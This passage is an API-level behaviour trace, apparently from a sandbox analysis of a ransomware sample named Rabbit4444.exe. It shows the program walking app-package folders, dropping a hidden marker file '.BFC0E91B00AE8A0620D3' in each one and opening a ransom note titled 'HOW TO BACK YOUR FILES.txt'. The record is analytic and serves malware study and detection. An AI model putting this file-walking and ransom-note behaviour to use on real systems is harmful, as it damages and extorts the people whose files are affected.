lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.915] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.915] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.915] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.915] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.915] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.915] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.915] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.915] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.915] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3a4ea6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3a4ea6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.915] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.915] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.915] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3a4ea6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3a4ea6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.915] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0061.915] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.915] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0061.916] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.916] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.916] CloseHandle (hObject=0x2a0) returned 1 [0061.916] CloseHandle (hObject=0x27c) returned 1 [0061.916] GetCurrentThreadId () returned 0xd98 [0061.916] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0061.916] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache" [0061.916] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0061.916] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0061.916] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache" [0061.916] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\" [0061.916] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0061.916] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.917] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.920] FlushFileBuffers (hFile=0x27c) returned 1 [0061.921] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.921] CloseHandle (hObject=0x27c) returned 1 [0061.921] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache") returned 97 [0061.921] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0061.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.922] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.922] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.922] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.922] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.922] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.922] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.922] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.922] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.922] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.922] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3a4ea6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3a4ea6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.922] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.922] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.922] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3a4ea6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3a4ea6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3a4ea6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.922] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0061.922] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.922] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.923] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.923] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.924] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.924] CloseHandle (hObject=0x29c) returned 1 [0061.924] CloseHandle (hObject=0x27c) returned 1 [0061.924] GetCurrentThreadId () returned 0xd98 [0061.924] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0061.924] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData" [0061.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0061.924] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0061.924] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData" [0061.924] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\" [0061.924] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0061.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.925] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.927] FlushFileBuffers (hFile=0x27c) returned 1 [0061.928] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.928] CloseHandle (hObject=0x27c) returned 1 [0061.929] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData") returned 94 [0061.929] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.929] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.929] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.929] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.929] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.929] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.929] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92488a4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x92488a4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.929] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.929] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.929] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.929] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.929] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.929] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3cb1d5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3cb1d5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.929] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3cb1d5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3cb1d5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.929] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.930] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.930] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.930] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.930] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.930] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.930] CloseHandle (hObject=0x29c) returned 1 [0061.930] CloseHandle (hObject=0x27c) returned 1 [0061.931] GetCurrentThreadId () returned 0xd98 [0061.931] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0061.931] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC" [0061.931] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e368 | out: hHeap=0xe0000) returned 1 [0061.931] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0061.931] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC" [0061.931] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\" [0061.931] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0061.931] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.934] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.936] FlushFileBuffers (hFile=0x27c) returned 1 [0061.937] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.938] CloseHandle (hObject=0x27c) returned 1 [0061.938] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC") returned 89 [0061.938] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.938] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.938] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.938] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.938] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.938] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.938] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.938] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.938] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.938] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.938] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.938] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.938] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3cb1d5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3cb1d5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3cb1d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR 